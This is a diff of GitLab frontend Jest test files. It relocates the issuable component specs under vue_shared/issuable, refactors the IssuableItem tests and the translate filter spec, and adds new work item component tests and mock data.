30b116bc35c..cbfd05e7903 100644 --- a/spec/frontend/issuable_create/components/issuable_form_spec.js +++ b/spec/frontend/vue_shared/issuable/create/components/issuable_form_spec.js @@ -1,7 +1,7 @@ import { GlFormInput } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import IssuableForm from '~/issuable_create/components/issuable_form.vue'; +import IssuableForm from '~/vue_shared/issuable/create/components/issuable_form.vue'; import MarkdownField from '~/vue_shared/components/markdown/field.vue'; import LabelsSelect from '~/vue_shared/components/sidebar/labels_select_vue/labels_select_root.vue'; diff --git a/spec/frontend/issuable_list/components/issuable_bulk_edit_sidebar_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_bulk_edit_sidebar_spec.js index 52a238eac7c..0f33a3d1122 100644 --- a/spec/frontend/issuable_list/components/issuable_bulk_edit_sidebar_spec.js +++ b/spec/frontend/vue_shared/issuable/list/components/issuable_bulk_edit_sidebar_spec.js @@ -1,6 +1,6 @@ import { shallowMount } from '@vue/test-utils'; -import IssuableBulkEditSidebar from '~/issuable_list/components/issuable_bulk_edit_sidebar.vue'; +import IssuableBulkEditSidebar from '~/vue_shared/issuable/list/components/issuable_bulk_edit_sidebar.vue'; const createComponent = ({ expanded = true } = {}) => shallowMount(IssuableBulkEditSidebar, { diff --git a/spec/frontend/issuable_list/components/issuable_item_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_item_spec.js index ac3bf7f3269..e38a80e7734 100644 --- a/spec/frontend/issuable_list/components/issuable_item_spec.js +++ b/spec/frontend/vue_shared/issuable/list/components/issuable_item_spec.js @@ -1,19 +1,25 @@ import { GlLink, GlLabel, GlIcon, GlFormCheckbox, GlSprintf } from '@gitlab/ui'; -import { shallowMount } from '@vue/test-utils'; import { useFakeDate } from 'helpers/fake_date'; -import IssuableItem from '~/issuable_list/components/issuable_item.vue'; -import IssuableAssignees 
from '~/vue_shared/components/issue/issue_assignees.vue'; +import { shallowMountExtended as shallowMount } from 'helpers/vue_test_utils_helper'; +import IssuableItem from '~/vue_shared/issuable/list/components/issuable_item.vue'; +import IssuableAssignees from '~/issuable/components/issue_assignees.vue'; import { mockIssuable, mockRegularLabel, mockScopedLabel } from '../mock_data'; -const createComponent = ({ issuableSymbol = '#', issuable = mockIssuable, slots = {} } = {}) => +const createComponent = ({ + issuableSymbol = '#', + issuable = mockIssuable, + enableLabelPermalinks = true, + showCheckbox = true, + slots = {}, +} = {}) => shallowMount(IssuableItem, { propsData: { issuableSymbol, issuable, - enableLabelPermalinks: true, + enableLabelPermalinks, showDiscussions: true, - showCheckbox: false, + showCheckbox, }, slots, stubs: { @@ -34,7 +40,6 @@ describe('IssuableItem', () => { beforeEach(() => { gon.gitlab_url = MOCK_GITLAB_URL; - wrapper = createComponent(); }); afterEach(() => { @@ -45,6 +50,8 @@ describe('IssuableItem', () => { describe('computed', () => { describe('author', () => { it('returns `issuable.author` reference', () => { + wrapper = createComponent(); + expect(wrapper.vm.author).toEqual(mockIssuable.author); }); }); @@ -59,7 +66,7 @@ describe('IssuableItem', () => { `( 'returns $returnValue when value of `issuable.author.id` is $authorId', async ({ authorId, returnValue }) => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, author: { @@ -86,7 +93,7 @@ describe('IssuableItem', () => { `( 'returns $returnValue when `issuable.webUrl` is $urlType', async ({ issuableWebUrl, returnValue }) => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, webUrl: issuableWebUrl, @@ -102,11 +109,13 @@ describe('IssuableItem', () => { describe('labels', () => { it('returns `issuable.labels.nodes` reference when it is available', () => { + wrapper = createComponent(); + 
expect(wrapper.vm.labels).toEqual(mockLabels); }); it('returns `issuable.labels` reference when it is available', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, labels: mockLabels, @@ -119,7 +128,7 @@ describe('IssuableItem', () => { }); it('returns empty array when none of `issuable.labels.nodes` or `issuable.labels` are available', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, labels: null, @@ -134,12 +143,16 @@ describe('IssuableItem', () => { describe('assignees', () => { it('returns `issuable.assignees` reference when it is available', () => { + wrapper = createComponent(); + expect(wrapper.vm.assignees).toBe(mockIssuable.assignees); }); }); describe('updatedAt', () => { it('returns string containing timeago string based on `issuable.updatedAt`', () => { + wrapper = createComponent(); + expect(wrapper.vm.updatedAt).toContain('updated'); expect(wrapper.vm.updatedAt).toContain('ago'); }); @@ -155,7 +168,7 @@ describe('IssuableItem', () => { `( 'returns $returnValue when issuable.userDiscussionsCount is $userDiscussionsCount', ({ userDiscussionsCount, returnValue }) => { - const wrapperWithDiscussions = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: { ...mockIssuable, @@ -163,9 +176,7 @@ describe('IssuableItem', () => { }, }); - expect(wrapperWithDiscussions.vm.showDiscussions).toBe(returnValue); - - wrapperWithDiscussions.destroy(); + expect(wrapper.findByTestId('issuable-discussions').exists()).toBe(returnValue); }, ); }); @@ -180,6 +191,8 @@ describe('IssuableItem', () => { `( 'return $returnValue when provided label param is a $labelType label', ({ label, returnValue }) => { + wrapper = createComponent(); + expect(wrapper.vm.scopedLabel(label)).toBe(returnValue); }, ); @@ -191,19 +204,23 @@ describe('IssuableItem', () => { ${{ title: 'foo' }} | ${'title'} | ${'foo'} ${{ name: 'foo' }} | ${'name'} | ${'foo'} `('returns string value of 
`label.$propWithTitle`', ({ label, returnValue }) => { + wrapper = createComponent(); + expect(wrapper.vm.labelTitle(label)).toBe(returnValue); }); }); describe('labelTarget', () => { it('returns target string for a provided label param when `enableLabelPermalinks` is true', () => { + wrapper = createComponent(); + expect(wrapper.vm.labelTarget(mockRegularLabel)).toBe( '?label_name[]=Documentation%20Update', ); }); it('returns string "#" for a provided label param when `enableLabelPermalinks` is false', async () => { - wrapper.setProps({ + wrapper = createComponent({ enableLabelPermalinks: false, }); @@ -223,7 +240,7 @@ describe('IssuableItem', () => { `( 'renders issuable title correctly when `gitlabWebUrl` is `$gitlabWebUrl` and webUrl is `$webUrl`', async ({ webUrl, gitlabWebUrl, expectedHref, expectedTarget }) => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, webUrl, @@ -243,7 +260,7 @@ describe('IssuableItem', () => { ); it('renders checkbox when `showCheckbox` prop is true', async () => { - wrapper.setProps({ + wrapper = createComponent({ showCheckbox: true, }); @@ -262,7 +279,7 @@ describe('IssuableItem', () => { }); it('renders issuable title with `target` set as "_blank" when issuable.webUrl is external', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, webUrl: 'http://jira.atlassian.net/browse/IG-1', @@ -277,7 +294,7 @@ describe('IssuableItem', () => { }); it('renders issuable confidential icon when issuable is confidential', async () => { - wrapper.setProps({ + wrapper = createComponent({ issuable: { ...mockIssuable, confidential: true, @@ -296,7 +313,21 @@ describe('IssuableItem', () => { }); }); + it('renders spam icon when issuable is hidden', async () => { + wrapper = createComponent({ issuable: { ...mockIssuable, hidden: true } }); + + const hiddenIcon = wrapper.findComponent(GlIcon); + + expect(hiddenIcon.props('name')).toBe('spam'); + 
expect(hiddenIcon.attributes()).toMatchObject({ + title: 'This issue is hidden because its author has been banned', + arialabel: 'Hidden', + }); + }); + it('renders task status', () => { + wrapper = createComponent(); + const taskStatus = wrapper.find('[data-testid="task-status"]'); const expected = `${mockIssuable.taskCompletionStatus.completedCount} of ${mockIssuable.taskCompletionStatus.count} tasks completed`; @@ -304,6 +335,8 @@ describe('IssuableItem', () => { }); it('renders issuable reference', () => { + wrapper = createComponent(); + const referenceEl = wrapper.find('[data-testid="issuable-reference"]'); expect(referenceEl.exists()).toBe(true); @@ -311,7 +344,7 @@ describe('IssuableItem', () => { }); it('renders issuable reference via slot', () => { - const wrapperWithRefSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -320,15 +353,15 @@ describe('IssuableItem', () => { `, }, }); - const referenceEl = wrapperWithRefSlot.find('.js-reference'); + const referenceEl = wrapper.find('.js-reference'); expect(referenceEl.exists()).toBe(true); expect(referenceEl.text()).toBe(`${mockIssuable.iid}`); - - wrapperWithRefSlot.destroy(); }); it('renders issuable createdAt info', () => { + wrapper = createComponent(); + const createdAtEl = wrapper.find('[data-testid="issuable-created-at"]'); expect(createdAtEl.exists()).toBe(true); @@ -337,6 +370,8 @@ describe('IssuableItem', () => { }); it('renders issuable author info', () => { + wrapper = createComponent(); + const authorEl = wrapper.find('[data-testid="issuable-author"]'); expect(authorEl.exists()).toBe(true); @@ -351,7 +386,7 @@ describe('IssuableItem', () => { }); it('renders issuable author info via slot', () => { - const wrapperWithAuthorSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -360,16 +395,14 @@ describe('IssuableItem', () => { `, }, }); - const authorEl = 
wrapperWithAuthorSlot.find('.js-author'); + const authorEl = wrapper.find('.js-author'); expect(authorEl.exists()).toBe(true); expect(authorEl.text()).toBe(mockAuthor.name); - - wrapperWithAuthorSlot.destroy(); }); it('renders timeframe via slot', () => { - const wrapperWithTimeframeSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -378,15 +411,15 @@ describe('IssuableItem', () => { `, }, }); - const timeframeEl = wrapperWithTimeframeSlot.find('.js-timeframe'); + const timeframeEl = wrapper.find('.js-timeframe'); expect(timeframeEl.exists()).toBe(true); expect(timeframeEl.text()).toBe('Jan 1, 2020 - Mar 31, 2020'); - - wrapperWithTimeframeSlot.destroy(); }); it('renders gl-label component for each label present within `issuable` prop', () => { + wrapper = createComponent(); + const labelsEl = wrapper.findAll(GlLabel); expect(labelsEl.exists()).toBe(true); @@ -402,7 +435,7 @@ describe('IssuableItem', () => { }); it('renders issuable status via slot', () => { - const wrapperWithStatusSlot = createComponent({ + wrapper = createComponent({ issuableSymbol: '#', issuable: mockIssuable, slots: { @@ -411,15 +444,15 @@ describe('IssuableItem', () => { `, }, }); - const statusEl = wrapperWithStatusSlot.find('.js-status'); + const statusEl = wrapper.find('.js-status'); expect(statusEl.exists()).toBe(true); expect(statusEl.text()).toBe(`${mockIssuable.state}`); - - wrapperWithStatusSlot.destroy(); }); it('renders discussions count', () => { + wrapper = createComponent(); + const discussionsEl = wrapper.find('[data-testid="issuable-discussions"]'); expect(discussionsEl.exists()).toBe(true); @@ -432,6 +465,8 @@ describe('IssuableItem', () => { }); it('renders issuable-assignees component', () => { + wrapper = createComponent(); + const assigneesEl = wrapper.find(IssuableAssignees); expect(assigneesEl.exists()).toBe(true); @@ -443,6 +478,8 @@ describe('IssuableItem', () => { }); it('renders issuable updatedAt info', () 
=> { + wrapper = createComponent(); + const updatedAtEl = wrapper.find('[data-testid="issuable-updated-at"]'); expect(updatedAtEl.attributes('title')).toBe('Sep 10, 2020 11:41am UTC'); diff --git a/spec/frontend/issuable_list/components/issuable_list_root_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_list_root_spec.js index 7dddd2c3405..5979a65e3cd 100644 --- a/spec/frontend/issuable_list/components/issuable_list_root_spec.js +++ b/spec/frontend/vue_shared/issuable/list/components/issuable_list_root_spec.js @@ -1,12 +1,12 @@ -import { GlKeysetPagination, GlSkeletonLoading, GlPagination } from '@gitlab/ui'; +import { GlAlert, GlKeysetPagination, GlSkeletonLoading, GlPagination } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import VueDraggable from 'vuedraggable'; import { TEST_HOST } from 'helpers/test_constants'; -import IssuableItem from '~/issuable_list/components/issuable_item.vue'; -import IssuableListRoot from '~/issuable_list/components/issuable_list_root.vue'; -import IssuableTabs from '~/issuable_list/components/issuable_tabs.vue'; +import IssuableItem from '~/vue_shared/issuable/list/components/issuable_item.vue'; +import IssuableListRoot from '~/vue_shared/issuable/list/components/issuable_list_root.vue'; +import IssuableTabs from '~/vue_shared/issuable/list/components/issuable_tabs.vue'; import FilteredSearchBar from '~/vue_shared/components/filtered_search_bar/filtered_search_bar_root.vue'; import { mockIssuableListProps, mockIssuables } from '../mock_data'; @@ -36,6 +36,7 @@ const createComponent = ({ props = {}, data = {} } = {}) => describe('IssuableListRoot', () => { let wrapper; + const findAlert = () => wrapper.findComponent(GlAlert); const findFilteredSearchBar = () => wrapper.findComponent(FilteredSearchBar); const findGlKeysetPagination = () => wrapper.findComponent(GlKeysetPagination); const findGlPagination = () => wrapper.findComponent(GlPagination); @@ -310,6 +311,30 @@ 
describe('IssuableListRoot', () => { hasPreviousPage: true, }); }); + + describe('alert', () => { + const error = 'oopsie!'; + + it('shows alert when there is an error', () => { + wrapper = createComponent({ props: { error } }); + + expect(findAlert().text()).toBe(error); + }); + + it('emits "dismiss-alert" event when dismissed', () => { + wrapper = createComponent({ props: { error } }); + + findAlert().vm.$emit('dismiss'); + + expect(wrapper.emitted('dismiss-alert')).toEqual([[]]); + }); + + it('does not render when there is no error', () => { + wrapper = createComponent(); + + expect(findAlert().exists()).toBe(false); + }); + }); }); describe('events', () => { diff --git a/spec/frontend/issuable_list/components/issuable_tabs_spec.js b/spec/frontend/vue_shared/issuable/list/components/issuable_tabs_spec.js index cbf5765078a..8c22b67bdbe 100644 --- a/spec/frontend/issuable_list/components/issuable_tabs_spec.js +++ b/spec/frontend/vue_shared/issuable/list/components/issuable_tabs_spec.js @@ -1,7 +1,7 @@ import { GlTab, GlBadge } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; -import IssuableTabs from '~/issuable_list/components/issuable_tabs.vue'; +import IssuableTabs from '~/vue_shared/issuable/list/components/issuable_tabs.vue'; import { mockIssuableListProps } from '../mock_data'; diff --git a/spec/frontend/issuable_list/mock_data.js b/spec/frontend/vue_shared/issuable/list/mock_data.js index e2fa99f7cc9..e2fa99f7cc9 100644 --- a/spec/frontend/issuable_list/mock_data.js +++ b/spec/frontend/vue_shared/issuable/list/mock_data.js diff --git a/spec/frontend/issuable_show/components/issuable_body_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_body_spec.js index 6fa298ca3f2..41bacf18a68 100644 --- a/spec/frontend/issuable_show/components/issuable_body_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_body_spec.js @@ -1,11 +1,11 @@ import { shallowMount } from '@vue/test-utils'; import { useFakeDate } from 
'helpers/fake_date'; -import IssuableBody from '~/issuable_show/components/issuable_body.vue'; +import IssuableBody from '~/vue_shared/issuable/show/components/issuable_body.vue'; -import IssuableDescription from '~/issuable_show/components/issuable_description.vue'; -import IssuableEditForm from '~/issuable_show/components/issuable_edit_form.vue'; -import IssuableTitle from '~/issuable_show/components/issuable_title.vue'; +import IssuableDescription from '~/vue_shared/issuable/show/components/issuable_description.vue'; +import IssuableEditForm from '~/vue_shared/issuable/show/components/issuable_edit_form.vue'; +import IssuableTitle from '~/vue_shared/issuable/show/components/issuable_title.vue'; import TaskList from '~/task_list'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; diff --git a/spec/frontend/issuable_show/components/issuable_description_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_description_spec.js index 1058e5decfd..f2211e5b2bb 100644 --- a/spec/frontend/issuable_show/components/issuable_description_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_description_spec.js @@ -1,7 +1,7 @@ import { shallowMount } from '@vue/test-utils'; import $ from 'jquery'; -import IssuableDescription from '~/issuable_show/components/issuable_description.vue'; +import IssuableDescription from '~/vue_shared/issuable/show/components/issuable_description.vue'; import { mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_edit_form_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_edit_form_spec.js index 184c9fe251c..051ffd27af4 100644 --- a/spec/frontend/issuable_show/components/issuable_edit_form_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_edit_form_spec.js @@ -1,8 +1,8 @@ import { GlFormInput } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import IssuableEditForm from 
'~/issuable_show/components/issuable_edit_form.vue'; -import IssuableEventHub from '~/issuable_show/event_hub'; +import IssuableEditForm from '~/vue_shared/issuable/show/components/issuable_edit_form.vue'; +import IssuableEventHub from '~/vue_shared/issuable/show/event_hub'; import MarkdownField from '~/vue_shared/components/markdown/field.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_header_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_header_spec.js index b85f2dd1999..41735923957 100644 --- a/spec/frontend/issuable_show/components/issuable_header_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_header_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlAvatarLabeled } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { extendedWrapper } from 'helpers/vue_test_utils_helper'; -import IssuableHeader from '~/issuable_show/components/issuable_header.vue'; +import IssuableHeader from '~/vue_shared/issuable/show/components/issuable_header.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_show_root_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_show_root_spec.js index 7ad409c3a74..d1eb1366225 100644 --- a/spec/frontend/issuable_show/components/issuable_show_root_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_show_root_spec.js @@ -1,10 +1,10 @@ import { shallowMount } from '@vue/test-utils'; -import IssuableBody from '~/issuable_show/components/issuable_body.vue'; -import IssuableHeader from '~/issuable_show/components/issuable_header.vue'; -import IssuableShowRoot from '~/issuable_show/components/issuable_show_root.vue'; +import IssuableBody from '~/vue_shared/issuable/show/components/issuable_body.vue'; +import IssuableHeader from '~/vue_shared/issuable/show/components/issuable_header.vue'; 
+import IssuableShowRoot from '~/vue_shared/issuable/show/components/issuable_show_root.vue'; -import IssuableSidebar from '~/issuable_sidebar/components/issuable_sidebar_root.vue'; +import IssuableSidebar from '~/vue_shared/issuable/sidebar/components/issuable_sidebar_root.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/components/issuable_title_spec.js b/spec/frontend/vue_shared/issuable/show/components/issuable_title_spec.js index df6fbdea76b..1fcf37a0477 100644 --- a/spec/frontend/issuable_show/components/issuable_title_spec.js +++ b/spec/frontend/vue_shared/issuable/show/components/issuable_title_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlButton, GlIntersectionObserver } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import IssuableTitle from '~/issuable_show/components/issuable_title.vue'; +import IssuableTitle from '~/vue_shared/issuable/show/components/issuable_title.vue'; import { mockIssuableShowProps, mockIssuable } from '../mock_data'; diff --git a/spec/frontend/issuable_show/mock_data.js b/spec/frontend/vue_shared/issuable/show/mock_data.js index 986d32b4982..f5f3ed58655 100644 --- a/spec/frontend/issuable_show/mock_data.js +++ b/spec/frontend/vue_shared/issuable/show/mock_data.js @@ -1,4 +1,4 @@ -import { mockIssuable as issuable } from '../issuable_list/mock_data'; +import { mockIssuable as issuable } from 'jest/vue_shared/issuable/list/mock_data'; export const mockIssuable = { ...issuable, diff --git a/spec/frontend/issuable_sidebar/components/issuable_sidebar_root_spec.js b/spec/frontend/vue_shared/issuable/sidebar/components/issuable_sidebar_root_spec.js index c872925cca2..788ba70ddc0 100644 --- a/spec/frontend/issuable_sidebar/components/issuable_sidebar_root_spec.js +++ b/spec/frontend/vue_shared/issuable/sidebar/components/issuable_sidebar_root_spec.js @@ -2,8 +2,8 @@ import { 
GlBreakpointInstance as bp } from '@gitlab/ui/dist/utils'; import Cookies from 'js-cookie'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; -import IssuableSidebarRoot from '~/issuable_sidebar/components/issuable_sidebar_root.vue'; -import { USER_COLLAPSED_GUTTER_COOKIE } from '~/issuable_sidebar/constants'; +import IssuableSidebarRoot from '~/vue_shared/issuable/sidebar/components/issuable_sidebar_root.vue'; +import { USER_COLLAPSED_GUTTER_COOKIE } from '~/vue_shared/issuable/sidebar/constants'; const MOCK_LAYOUT_PAGE_CLASS = 'layout-page'; diff --git a/spec/frontend/vue_shared/security_reports/mock_data.js b/spec/frontend/vue_shared/security_reports/mock_data.js index cdaeec78e47..2b1513bb0f8 100644 --- a/spec/frontend/vue_shared/security_reports/mock_data.js +++ b/spec/frontend/vue_shared/security_reports/mock_data.js @@ -341,12 +341,15 @@ export const securityReportMergeRequestDownloadPathsQueryNoArtifactsResponse = { export const securityReportMergeRequestDownloadPathsQueryResponse = { project: { + id: '1', mergeRequest: { + id: 'mr-1', headPipeline: { id: 'gid://gitlab/Ci::Pipeline/176', jobs: { nodes: [ { + id: 'job-1', name: 'secret_detection', artifacts: { nodes: [ @@ -368,6 +371,7 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-2', name: 'bandit-sast', artifacts: { nodes: [ @@ -389,6 +393,7 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-3', name: 'eslint-sast', artifacts: { nodes: [ @@ -410,6 +415,7 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-4', name: 'all_artifacts', artifacts: { nodes: [ @@ -449,11 +455,13 @@ export const securityReportMergeRequestDownloadPathsQueryResponse = { export const securityReportPipelineDownloadPathsQueryResponse = { project: { + id: 'project-1', pipeline: { id: 'gid://gitlab/Ci::Pipeline/176', jobs: { nodes: [ { + 
id: 'job-1', name: 'secret_detection', artifacts: { nodes: [ @@ -475,6 +483,7 @@ export const securityReportPipelineDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-2', name: 'bandit-sast', artifacts: { nodes: [ @@ -496,6 +505,7 @@ export const securityReportPipelineDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-3', name: 'eslint-sast', artifacts: { nodes: [ @@ -517,6 +527,7 @@ export const securityReportPipelineDownloadPathsQueryResponse = { __typename: 'CiJob', }, { + id: 'job-4', name: 'all_artifacts', artifacts: { nodes: [ diff --git a/spec/frontend/vue_shared/translate_spec.js b/spec/frontend/vue_shared/translate_spec.js index 42aa28a6309..30417161968 100644 --- a/spec/frontend/vue_shared/translate_spec.js +++ b/spec/frontend/vue_shared/translate_spec.js @@ -1,9 +1,9 @@ -import { mount, createLocalVue } from '@vue/test-utils'; +import { mount } from '@vue/test-utils'; +import Vue from 'vue'; import locale from '~/locale'; import Translate from '~/vue_shared/translate'; -const localVue = createLocalVue(); -localVue.use(Translate); +Vue.use(Translate); describe('Vue translate filter', () => { const createTranslationMock = (key, ...translations) => { @@ -26,16 +26,13 @@ describe('Vue translate filter', () => { const translation = 'singular_translated'; createTranslationMock(key, translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ __('${key}') }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); @@ -45,16 +42,13 @@ describe('Vue translate filter', () => { const translationPlural = 'plural_multiple translation'; createTranslationMock(key, 'plural_singular translation', translationPlural); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__('${key}', 'plurals', 2) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translationPlural); }); @@ -67,31 +61,25 @@ 
describe('Vue translate filter', () => { }); it('and n === 1', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__('${key}', '%d days', 1) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe('1 singular translated'); }); it('and n > 1', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__('${key}', '%d days', 2) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe('2 plural translated'); }); @@ -107,31 +95,25 @@ describe('Vue translate filter', () => { }); it('and using two parameters', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ s__('Context', 'Foobar') }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(expectation); }); it('and using the pipe syntax', () => { - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ s__('${key}') }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(expectation); }); @@ -141,9 +123,8 @@ describe('Vue translate filter', () => { const translation = 'multiline string translated'; createTranslationMock('multiline string', translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ __(\` multiline @@ -151,9 +132,7 @@ describe('Vue translate filter', () => { \`) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); @@ -163,9 +142,8 @@ describe('Vue translate filter', () => { createTranslationMock('multiline string', 'multiline string singular', translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ n__( \` @@ -180,9 +158,7 @@ describe('Vue translate filter', () => { ) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); @@ -192,9 +168,8 @@ describe('Vue translate filter', () => { 
createTranslationMock('Context| multiline string', translation); - const wrapper = mount( - { - template: ` + const wrapper = mount({ + template: ` <span> {{ s__( \` @@ -205,9 +180,7 @@ describe('Vue translate filter', () => { ) }} </span> `, - }, - { localVue }, - ); + }); expect(wrapper.text()).toBe(translation); }); diff --git a/spec/frontend/work_items/components/item_title_spec.js b/spec/frontend/work_items/components/item_title_spec.js new file mode 100644 index 00000000000..0f6e7091c59 --- /dev/null +++ b/spec/frontend/work_items/components/item_title_spec.js @@ -0,0 +1,56 @@ +import { shallowMount } from '@vue/test-utils'; +import { escape } from 'lodash'; +import ItemTitle from '~/work_items/components/item_title.vue'; + +jest.mock('lodash/escape', () => jest.fn((fn) => fn)); + +const createComponent = ({ initialTitle = 'Sample title', disabled = false } = {}) => + shallowMount(ItemTitle, { + propsData: { + initialTitle, + disabled, + }, + }); + +describe('ItemTitle', () => { + let wrapper; + const mockUpdatedTitle = 'Updated title'; + const findInputEl = () => wrapper.find('span#item-title'); + + beforeEach(() => { + wrapper = createComponent(); + }); + + afterEach(() => { + wrapper.destroy(); + }); + + it('renders title contents', () => { + expect(findInputEl().attributes()).toMatchObject({ + 'data-placeholder': 'Add a title...', + contenteditable: 'true', + }); + expect(findInputEl().text()).toBe('Sample title'); + }); + + it('renders title contents with editing disabled', () => { + wrapper = createComponent({ + disabled: true, + }); + + expect(wrapper.classes()).toContain('gl-cursor-not-allowed'); + expect(findInputEl().attributes('contenteditable')).toBe('false'); + }); + + it.each` + eventName | sourceEvent + ${'title-changed'} | ${'blur'} + ${'title-input'} | ${'keyup'} + `('emits "$eventName" event on input $sourceEvent', async ({ eventName, sourceEvent }) => { + findInputEl().element.innerText = mockUpdatedTitle; + await 
findInputEl().trigger(sourceEvent); + + expect(wrapper.emitted(eventName)).toBeTruthy(); + expect(escape).toHaveBeenCalledWith(mockUpdatedTitle); + }); +}); diff --git a/spec/frontend/work_items/mock_data.js b/spec/frontend/work_items/mock_data.js index efb4aa2feb2..9741a193258 100644 --- a/spec/frontend/work_items/mock_data.js +++ b/spec/frontend/work_items/mock_data.js @@ -1,13 +1,13 @@ export const workItemQueryResponse = { workItem: { - __typename: 'WorkItem', + __typename: 'LocalWorkItem', id: '1', type: 'FEATURE', widgets: { - __typename: 'WorkItemWidgetConnection', + __typename: 'LocalWorkItemWidgetConnection', nodes: [ { - __typename: 'TitleWidget', + __typename: 'LocalTitleWidget', type: 'TITLE', contentText: 'Test', }, @@ -15,3 +15,22 @@ export const workItemQueryResponse = { }, }, }; + +export const updateWorkItemMutationResponse = { + __typename: 'LocalUpdateWorkItemPayload', + workItem: { + __typename: 'LocalWorkItem', + id: '1', + widgets: { + __typename: 'LocalWorkItemWidgetConnection', + nodes: [ + { + __typename: 'LocalTitleWidget', + type: 'TITLE', + enabled: true, + contentText: 'Updated title', + }, + ], + }, + }, +}; diff --git a/spec/frontend/work_items/pages/create_work_item_spec.js b/spec/frontend/work_items/pages/create_work_item_spec.js new file mode 100644 index 00000000000..71e153d30c3 --- /dev/null +++ b/spec/frontend/work_items/pages/create_work_item_spec.js @@ -0,0 +1,94 @@ +import Vue, { nextTick } from 'vue'; +import VueApollo from 'vue-apollo'; +import { GlAlert } from '@gitlab/ui'; +import { shallowMount } from '@vue/test-utils'; +import createMockApollo from 'helpers/mock_apollo_helper'; +import waitForPromises from 'helpers/wait_for_promises'; +import CreateWorkItem from '~/work_items/pages/create_work_item.vue'; +import ItemTitle from '~/work_items/components/item_title.vue'; +import { resolvers } from '~/work_items/graphql/resolvers'; + +Vue.use(VueApollo); + +describe('Create work item component', () => { + let wrapper; + let 
fakeApollo; + + const findAlert = () => wrapper.findComponent(GlAlert); + const findTitleInput = () => wrapper.findComponent(ItemTitle); + const findCreateButton = () => wrapper.find('[data-testid="create-button"]'); + const findCancelButton = () => wrapper.find('[data-testid="cancel-button"]'); + + const createComponent = ({ data = {} } = {}) => { + fakeApollo = createMockApollo([], resolvers); + wrapper = shallowMount(CreateWorkItem, { + apolloProvider: fakeApollo, + data() { + return { + ...data, + }; + }, + mocks: { + $router: { + go: jest.fn(), + push: jest.fn(), + }, + }, + }); + }; + + afterEach(() => { + wrapper.destroy(); + fakeApollo = null; + }); + + it('does not render error by default', () => { + createComponent(); + + expect(findAlert().exists()).toBe(false); + }); + + it('renders a disabled Create button when title input is empty', () => { + createComponent(); + + expect(findCreateButton().props('disabled')).toBe(true); + }); + + it('redirects to the previous page on Cancel button click', () => { + createComponent(); + findCancelButton().vm.$emit('click'); + + expect(wrapper.vm.$router.go).toHaveBeenCalledWith(-1); + }); + + 